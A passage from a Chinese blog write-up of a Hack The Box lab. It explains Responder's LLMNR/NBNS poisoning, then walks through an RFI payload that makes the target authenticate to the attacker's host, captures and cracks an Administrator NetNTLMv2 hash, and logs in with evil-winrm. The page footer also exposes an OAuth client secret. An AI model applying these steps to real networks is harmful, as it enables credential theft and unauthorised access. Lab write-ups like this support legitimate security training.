<h4 id="内置-https-身份验证服务器"><a class="markdownIt-Anchor" href="#内置-https-身份验证服务器"></a> 内置 HTTPS 身份验证服务器</h4>
<p>与上面相同。 文件夹 certs/ 包含 2 个默认密钥，其中包括一个虚拟私钥。 这是故意的，目的是让 Responder 开箱即用。 添加了一个脚本，以防您需要生成自己的自签名密钥对。</p>
<h4 id="内置-ldap-身份验证服务器"><a class="markdownIt-Anchor" href="#内置-ldap-身份验证服务器"></a> 内置 LDAP 身份验证服务器</h4>
<p>为了将 LDAP 身份验证重定向到此工具，您需要为早于 Vista 的 Windows 版本设置选项 -r（用于 HTTP 服务器查找的 NBT-NS 查询使用工作站服务名称后缀发送）。 对于 Vista 及更高版本，将使用 LLMNR。 该服务器支持 NTLMSSP 哈希和简单身份验证（明文身份验证）。 该服务器已在 Windows 支持工具&quot;ldp&quot;和 LdapAdmin 上成功测试。</p>
<h4 id="内置-ftp-pop3-imap-smtp-身份验证服务器"><a class="markdownIt-Anchor" href="#内置-ftp-pop3-imap-smtp-身份验证服务器"></a> 内置 FTP、POP3、IMAP、SMTP 身份验证服务器</h4>
<p>该模块将收集明文凭据</p>
<h4 id="内置-dns-服务器"><a class="markdownIt-Anchor" href="#内置-dns-服务器"></a> 内置 DNS 服务器</h4>
<p>该服务器将回答 A 类查询。 当它与 ARP 欺骗结合起来时，这真的很方便。</p>
<h4 id="内置-wpad-代理服务器"><a class="markdownIt-Anchor" href="#内置-wpad-代理服务器"></a> 内置 WPAD 代理服务器</h4>
<p>如果启用了“自动检测设置”，此模块将捕获网络上启动 Internet Explorer 的任何人的所有 HTTP 请求。 该模块非常有效。 您可以在 Responder.conf 中配置自定义 PAC 脚本，并将 HTML 注入服务器的响应中。 请参阅 Responder.conf。</p>
<h4 id="浏览器监听器"><a class="markdownIt-Anchor" href="#浏览器监听器"></a> 浏览器监听器</h4>
<p>该模块允许在隐身模式下找到 PDC。</p>
<h4 id="指纹识别"><a class="markdownIt-Anchor" href="#指纹识别"></a> 指纹识别</h4>
<p>当使用选项 <code>-f </code>时，响应程序将对发出 LLMNR/NBT-NS 查询的每个主机进行指纹识别。 所有采集模块在指纹模式下仍然可以工作。</p>
<h4 id="icmp-重定向"><a class="markdownIt-Anchor" href="#icmp-重定向"></a> ICMP 重定向</h4>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python tools/Icmp-Redirect.py</span><br></pre></td></tr></table></figure>
<p>适用于 Windows XP/2003 及更早版本上的 MITM 域成员。 这种攻击与 DNS 模块相结合非常有效。</p>
<h4 id="流氓-dhcp"><a class="markdownIt-Anchor" href="#流氓-dhcp"></a> 流氓 DHCP</h4>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python tools/DHCP.py</span><br></pre></td></tr></table></figure>
<p>DHCP 通知欺骗。 允许您让真正的 DHCP 服务器发布 IP 地址，然后发送 DHCP Inform 应答以将您的 IP 地址设置为主 DNS 服务器，以及您自己的 WPAD URL。</p>
<h4 id="分析模式"><a class="markdownIt-Anchor" href="#分析模式"></a> 分析模式</h4>
<p>该模块允许您查看网络上的 NBT-NS、BROWSER、LLMNR、DNS 请求，而不会破坏任何响应。 此外，您还可以被动映射域、MSSQL 服务器、工作站，看看 ICMP 重定向攻击在您的子网上是否可行。</p>
<h3 id="0x023-responder欺骗原理"><a class="markdownIt-Anchor" href="#0x023-responder欺骗原理"></a> 0x02.3 Responder欺骗原理</h3>
<p>在使用Responder之前，我们要先了解windwos默认开启的三种协议，这三种协议分别是<strong>链路本地多播名称解析（LLMNR）</strong>、<strong>名称服务器(NBNS) 协议</strong>和<strong>多播DNS（mdns）协议</strong>。</p>
<h4 id="llmnr"><a class="markdownIt-Anchor" href="#llmnr"></a> LLMNR</h4>
<p>**链路本地多播名称解析（LLMNR）<strong>是一个</strong>基于域名系统（DNS）**数据包格式的协议，IPv4和IPv6的主机可以通过此协议对同一本地链路上的主机执行名称解析。Windows 操作系统从 Windows Vista开始就内嵌支持，Linux系统也通过systemd实现了此协议。它通过UDP 5355端口进行通信，且LLMNR支持IPV6。</p>
<h4 id="nbns"><a class="markdownIt-Anchor" href="#nbns"></a> NBNS</h4>
<p>**网络基本输入/输出系统(NetBIOS) **名称服务器(NBNS) 协议是 TCP/IP 上的 NetBIOS (NetBT) 协议族的一部分，它在基于 NetBIOS 名称访问的网络上提供主机名和地址映射方法。通过UDP 137端口进行通信，但NBNS不支持IPV6。</p>
<h4 id="mdns"><a class="markdownIt-Anchor" href="#mdns"></a> mDNS</h4>
<p>在计算机网络中 ，**多播DNS（ mDNS ）<strong>协议将主机名解析为不包含本地名称服务器的小型网络中的IP地址。 它是一种零配置服务，使用与</strong>单播域名系统（DNS）**基本相同的编程接口，数据包格式和操作语义。 虽然Stuart Cheshire将mDNS设计为独立协议，但它可以与标准DNS服务器协同工作。它通过UDP 5353端口进行通信，且mDNS也支持IPV6。</p>
<p>目前仅有windows 10以上的系统支持mdns，经测试发现，禁用了llmnr后mdns也会被禁用。</p>
<p><mark>总的来说，以上几种协议在windows中都是默认启用的，主要作用都是在DNS服务器解析失败后，尝试对windows主机名称进行解析，正因为默认启用、且实现方式又类似于ARP协议，并没有一个认证的过程，所以就会引发各种基于这两种协议的欺骗行为，而Responder正是通过这种方式，欺骗受害机器，并使受害机器在后续认证中发送其凭证。</mark></p>
<h3 id="0x024-使用方法"><a class="markdownIt-Anchor" href="#0x024-使用方法"></a> 0x02.4 使用方法</h3>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment">#responder -h</span></span><br><span class="line"></span><br><span class="line">用法：responder -I eth0 -w -d</span><br><span class="line">或者：</span><br><span class="line">responder -I eth0 -wd</span><br><span class="line"></span><br><span class="line">选项：</span><br><span class="line">   --version 显示程序的版本号并退出</span><br><span class="line">   -h, --<span class="built_in">help</span> 显示此帮助消息并退出</span><br><span class="line">   -A, --analyze 分析模式。 此选项允许您查看NBT-NS，</span><br><span class="line">                         BROWSER、LLMNR 请求没有响应。</span><br><span class="line">   -I eth0，--接口=eth0</span><br><span class="line">                         要使用的网络接口，可以使用“ALL”作为</span><br><span class="line">                         所有接口的通配符</span><br><span class="line">   -i 10.0.0.21,--ip=10.0.0.21</span><br><span class="line">                         要使用的本地 IP（仅适用于 OSX）</span><br><span class="line">   -6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed</span><br><span class="line">                         使用其他 IPv6 地址对所有请求进行毒害</span><br><span class="line">                         响应者之一。</span><br><span class="line">   -e 10.0.0.22, --externalip=10.0.0.22</span><br><span class="line">                         使用其他 IP 地址毒害所有请求</span><br><span class="line">                         响应者之一。</span><br><span class="line">   -b, --basic 返回基本 HTTP 身份验证。 默认值：NTLM</span><br><span class="line">   -d, --DHCP 启用 DHCP 广播请求的应答。 这</span><br><span class="line">                         选项将在 DHCP 响应中注入 WPAD 服务器。</span><br><span class="line">                         默认值：假</span><br><span class="line">   -D, --DHCP-DNS 该选项将在 DHCP 中注入 DNS 服务器</span><br><span class="line">                         响应，否则将添加 WPAD 服务器。</span><br><span class="line">                         默认值：假</span><br><span class="line">   -w, --wpad 启动 WPAD 恶意代理服务器。 默认值为</span><br><span class="line">                         错误的</span><br><span class="line">   -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY</span><br><span class="line">                         恶意 WPAD 代理使用的上游 HTTP 代理</span><br><span class="line">                         传出请求（格式：主机:端口）</span><br><span class="line">   -F, --ForceWpadAuth 对 wpad.dat 文件强制进行 NTLM/Basic 身份验证</span><br><span class="line">                         恢复。 这可能会导致登录提示。 默认：</span><br><span class="line">                         错误的</span><br><span class="line">   -P, --ProxyAuth 强制 NTLM（透明）/基本（提示）</span><br><span class="line">                         代理的身份验证。 WPAD 不需要</span><br><span class="line">                         在。 这个选项非常有效。 默认值：假</span><br><span class="line">   --lm 强制 Windows XP/2003 和 LM 哈希降级</span><br><span class="line">                         早些时候。 默认值：假</span><br><span class="line">   --disable-ess 强制 ESS 降级。 默认值：假</span><br><span class="line">   -v, --verbose 增加详细程度。</span><br></pre></td></tr></table></figure>
<h2 id="0x03-靶场实战responder与evil-winrm配合远程登录windows"><a class="markdownIt-Anchor" href="#0x03-靶场实战responder与evil-winrm配合远程登录windows"></a> 0x03 靶场实战–Responder与evil-winRM配合远程登录windows</h2>
<p>测试环境：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">kali</span> （攻击机）   <span class="number">192.168.154.128</span> </span><br><span class="line"><span class="attribute">vpn</span>接入内网环境: ip -&gt; <span class="number">10.10.14.115</span></span><br><span class="line"></span><br><span class="line"><span class="attribute">HTB</span>靶机 windows <span class="number">10</span> （受害机） <span class="number">10.129.48.161</span></span><br></pre></td></tr></table></figure>
<p>开启靶机</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230806235738164.png" alt="image-20230806235738164"></p>
<p>前置的步骤简单过一下：</p>
<blockquote>
<p>TASK 1</p>
<p>When visiting the web service using the IP address, what is the domain that we are being redirected to?</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">unika.htb</span><br></pre></td></tr></table></figure>
</blockquote>
<p>直接curl探测一下就行</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807004726426.png" alt="image-20230807004726426"></p>
<p>访问域名需要在本地的hosts文件就行一个配置：</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807010259553.png" alt="image-20230807010259553"></p>
<blockquote>
<p>TASK 2</p>
<p>Which scripting language is being used on the server to generate webpages?</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">PHP</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p>直接使用<strong>wappalyzer</strong>插件即可</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807005131865.png" alt="image-20230807005131865"></p>
<blockquote>
<p>TASK 3</p>
<p>What is the name of the URL parameter which is used to load different language versions of the webpage?</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">page</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p>查看网页源代码：</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807005737023.png" alt="image-20230807005737023"></p>
<blockquote>
<p>TASK 4</p>
<p>Which of the following values for the <code>page</code> parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “<a target="_blank" rel="noopener" href="//10.10.14.6/somefile">//10.10.14.6/somefile</a>”, “…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts”, “minikatz.exe”</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">..<span class="regexp">/../</span>..<span class="regexp">/../</span>..<span class="regexp">/../</span>..<span class="regexp">/../</span>windows<span class="regexp">/system32/</span>drivers<span class="regexp">/etc/</span>hosts</span><br></pre></td></tr></table></figure>
</blockquote>
<p>这里熟悉**文件包含漏洞(FI)**师傅能直接get到点：</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807010014461.png" alt="image-20230807010014461"></p>
<blockquote>
<p>TASK 5</p>
<p>Which of the following values for the <code>page</code> parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “<a target="_blank" rel="noopener" href="//10.10.14.6/somefile">//10.10.14.6/somefile</a>”, “…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts”, “minikatz.exe”</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="regexp">//</span><span class="number">10.10</span>.<span class="number">14.6</span>/somefile</span><br></pre></td></tr></table></figure>
</blockquote>
<p>这里和上一问同理</p>
<blockquote>
<p>TASK 6</p>
<p>What does NTLM stand for?</p>
<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NT (<span class="name">New</span> Technology) LAN Manager (<span class="name">NTLM</span>)</span><br></pre></td></tr></table></figure>
</blockquote>
<p>查阅Wiki百科就行（可以往下深入了解，这是内网的开始…<img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807010533593.png" alt="image-20230807010533593"></p>
<blockquote>
<p>TASK 7</p>
<p>Which flag do we use in the Responder utility to specify the network interface?</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-<span class="selector-tag">I</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p>通过上面的帮助文档可以知道</p>
<blockquote>
<p>TASK 8</p>
<p>There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as <code>john</code>, but the full name is what?.</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">John the Ripper</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p>也是查阅Wiki百科即可</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807010848902.png" alt="image-20230807010848902"></p>
<h3 id="本文的关键操作可直接跳至此处"><a class="markdownIt-Anchor" href="#本文的关键操作可直接跳至此处"></a> 本文的关键操作，可直接跳至此处</h3>
<p><mark>接下来将是本文的重点操作</mark>：</p>
<p>首先查看一下自身ip（vpn），并开启监听</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807012015738.png" alt="image-20230807012015738"></p>
<p>开启监听：<code>responder -I tun0 -w -d</code></p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807012128742.png" alt="image-20230807012128742"></p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807012239477.png" alt="image-20230807012239477"></p>
<p>接着利用web端的**远程文件包含漏洞(RFI)**访问我自身(10.10.14.115)的任意文件，进行一个Hash泄露</p>
<p><strong>payload：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://unika.htb/index.php?page=//10.10.14.115/somefile</span><br></pre></td></tr></table></figure>
<p>Responder就可以捕获到来自受害机(10.129.48.161)带有<strong>用户的密码(password)的Hash值</strong></p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807012755978.png" alt="image-20230807012755978"></p>
<figure class="highlight haxe"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Administrator:<span class="type"></span>:RESPONDER:<span class="type">9baf19c29ef21567</span>:<span class="number">761</span>FED4C7E3DB9BCFEF3E747E797B10D:<span class="type">010100000000000000E56ED168C8D901D119B9B66118B37A00000000020008004E0044004200450001001E00570049004E002D004C004C0047004200590033003100340035005800510004003400570049004E002D004C004C004700420059003300310034003500580051002E004E004400420045002E004C004F00430041004C00030014004E004400420045002E004C004F00430041004C00050014004E004400420045002E004C004F00430041004C000700080000E56ED168C8D901060004000200000008003000300000000000000001000000002000008400CDB8B7CEB11867758BC8795830343D40C19570BB7035C3D1AF789B7CE19F0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310035000000000000000000</span></span><br></pre></td></tr></table></figure>
<p>将这段字符串保存到一个txt文件中，接下来使用JHON进行一个Hash爆破：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john -w=/usr/share/wordlists/rockyou.txt admin.txt</span><br></pre></td></tr></table></figure>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807013110709.png" alt="image-20230807013110709"></p>
<p>能够获取到Administrator用户的密码为：badminton</p>
<blockquote>
<p>TASK 9</p>
<p>What is the password for the administrator user?</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">badminton</span></span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
<p>TASK 10</p>
<p>We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">5985</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p>使用nmap进行一个开放端口探测即可：</p>
<figure class="highlight nim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -p- --min-rate <span class="number">1000</span> -sV <span class="number">10</span>.<span class="number">129</span>.<span class="number">48</span>.<span class="number">161</span></span><br></pre></td></tr></table></figure>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807013453353.png" alt="image-20230807013453353"></p>
<p>拿到用户的账户和密码之后就到了一开始所提到的evil-winRM的使用了</p>
<figure class="highlight elm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title">evil</span>-winrm -i <span class="number">10.129</span><span class="number">.48</span><span class="number">.161</span> -u administrator -p badminton</span><br></pre></td></tr></table></figure>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807013831906.png" alt="image-20230807013831906"></p>
<p>这样就可以远程登录windows服务器啦，接下来我们能做到的事儿有很多。</p>
<p>第一步肯定是找题目需要的flag</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807014120801.png" alt="image-20230807014120801"></p>
<p>找到我们需要的flag文件只是最基础的，别着急提交，不然就浪费这个练习工具的好机会了</p>
<p>可以多试试几个命令：</p>
<p><strong>menu</strong>：加载Invoke-Binary和l04d3r-LoadDll函数。当加载ps1时，会显示其所有功能。</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807014438379.png" alt="image-20230807014438379"></p>
<p><strong>download</strong>：下载远程文件到本地，如果远程文件在当前目录中，则不需要local_path。</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">download local_path remote_path</span><br></pre></td></tr></table></figure>
<p>这里可以尝试一下下载flag.txt</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807014805570.png" alt="image-20230807014805570"></p>
<p><strong>upload</strong>：从本地（kali）上传文件到目标机器，如果本地文件与evil-winrm.rb文件位于同一目录中，则不需要remote_path。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload local_path remote_path</span><br></pre></td></tr></table></figure>
<p>这里可以试着传一个txt文件</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807015126775.png" alt="image-20230807015126775"></p>
<p><strong>Invoke-Binary</strong>：允许在内存中执行从c#编译的exe。该名称可使用tab键自动补全，最多允许3个参数。可执行文件必须在-e参数设置的路径中。</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807015427827.png" alt="image-20230807015427827"></p>
<p>这里由于我在连接时并未指定exe的路径所以这里没法正常执行命令。</p>
<p>**services：**列出所有服务（无需管理员权限）</p>
<p><img src="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807015616926.png" alt="image-20230807015616926"></p>
<p><strong>加载 powershell 脚本</strong></p>
<p>要加载ps1文件，你只需键入名称（可以使用tab自动补全）。脚本必须位于-s参数中设置的路径中。再次键入menu并查看加载的功能。</p>
<p>这里我没指定路径所以是没有powershell脚本的，所以没法正常演示。</p>
<h3 id="最后"><a class="markdownIt-Anchor" href="#最后"></a> 最后</h3>
<p>本次的分享就到这儿结束了，当然还有很多的操作和细节没有能够展示到，后续就留给师傅们去探索了。</p>
<p>下面附上本文的参考文章链接：</p>
<blockquote>
<p>参考文章：<a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/210479.html">https://www.freebuf.com/sectool/210479.html</a></p>
<p>​                    <a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/256844.html">https://www.freebuf.com/articles/network/256844.html</a></p>
<p>​                    <a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/210479.html">https://www.freebuf.com/sectool/210479.html</a></p>
<p>​                    <a target="_blank" rel="noopener" href="https://www.kali.org/tools/evil-winrm/">https://www.kali.org/tools/evil-winrm/</a></p>
</blockquote>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F/" rel="tag"># 渗透</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/" rel="prev" title="一次针对阿三的红帽渗透测试[getshell]">
                  <i class="fa fa-chevron-left"></i> 一次针对阿三的红帽渗透测试[getshell]
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/11/%E4%B8%80%E6%AC%A1%E9%AD%94%E6%94%B9%E8%9A%81%E5%89%91bypass-disable-functions%E6%8F%92%E4%BB%B6%E7%9A%84%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="next" title="一次魔改蚁剑bypass_disable_functions插件的打靶记录">
                  一次魔改蚁剑bypass_disable_functions插件的打靶记录 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">TWe1v3</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">319k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">4:50</span>
  </span>
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

    </div>
  </footer>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>


  <script class="next-config" data-name="mermaid" type="application/json">{"enable":true,"theme":{"light":"default","dark":"dark"},"js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mermaid/9.1.3/mermaid.min.js","integrity":"sha256-TIYL00Rhw/8WaoUhYTLX9SKIEFdXxg+yMWSLVUbhiLg="}}</script>
  <script src="/js/third-party/tags/mermaid.js"></script>



  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.0/katex.min.css" integrity="sha256-uik/hNqHWZldXh/0K35nqOSCff9F61/ZOFReqNOBgB0=" crossorigin="anonymous">
  <script class="next-config" data-name="katex" type="application/json">{"copy_tex_js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.0/contrib/copy-tex.min.js","integrity":"sha256-Us54+rSGDSTvIhKKUs4kygE2ipA0RXpWWh0/zLqw3bs="}}</script>
  <script src="/js/third-party/math/katex.js"></script>


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"TWe1v3# GitHub repo owner","repo":"TWe1v3-Blogcomment","client_id":"b1f12cb0fd210a7f001b# GitHub Application Client ID","client_secret":"80355aa1b174d1926079780262cdc80f1ca96516","admin_user":"TWe1v3","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","language":"zh-CN","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.min.js","integrity":"sha256-Pmj85ojLaPOWwRtlMJwmezB/Qg8BzvJp5eTzvXaYAfA="},"path_md5":"34c8ed9f7af00ed185711f2076b3ee67"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>


<script src="/live2d-widget/autoload.js"></script>
</body>
</html>
